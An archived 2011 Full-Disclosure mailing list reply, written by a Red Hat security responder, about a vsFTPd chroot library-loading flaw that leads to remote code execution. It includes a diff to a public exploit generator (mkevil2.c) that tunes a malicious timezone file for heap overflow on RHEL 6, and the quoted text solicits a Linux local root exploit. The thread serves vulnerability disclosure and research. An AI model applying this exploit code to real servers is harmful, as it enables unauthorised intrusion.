lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <716a2178-58a9-455f-93c7-5e769a212976@zmail15.collab.prod.int.phx2.redhat.com>
Date: Tue, 13 Dec 2011 15:12:56 -0500 (EST)
From: Ramon de C Valle <rcvalle@...hat.com>
To: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: vsFTPd remote code execution



> as you can obviously see vsftpd loads the /lib/libgcc_s.so.1 inside
> the chroot,
> so voila we have the same issue as with FreeBSD ftpd/proftpd.
> I am now looking into the possibility to modify
> http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
> 
> and use as the library. It will be a fun Proof of Concept.

Hats off to you! :)

> 
> Anyone with an up2date linux local root which only makes use of
> syscalls? :>
> 
> All this was tested on a CentOS 5.5 installation, vsFTPd 2.3.4 was
> compiled from sources
> and launched from xinetd.

I've also triggered this in RHEL 6 with its latest version of vsftpd installed with the following changes made to dividead's exploit:

--- a.c	2011-12-13 18:05:50.701999990 -0200
+++ b.c	2011-12-13 18:06:26.874000006 -0200
@@ -59,8 +59,8 @@
         total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                 & ~(__alignof__ (struct ttinfo) - 1));
 
-        /* value of chars, to get a malloc(0) */
-        evil2 = 0 - total_size;
+        /* value of chars, to get a malloc(500) */
+        evil2 = 0 - total_size + 500;
         PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
 
         p = (char *)&evil;
@@ -68,6 +68,6 @@
                 printf("%c", p[i]);
 
         /* data we overflow with */
-        for (i = 0; i < 50000; i++)
+        for (i = 0; i < 500000; i++)
                 printf("A");
 }


-- 
Ramon de C Valle / Red Hat Security Response Team

View attachment "mkevil2.c" of type "text/x-csrc" (2293 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ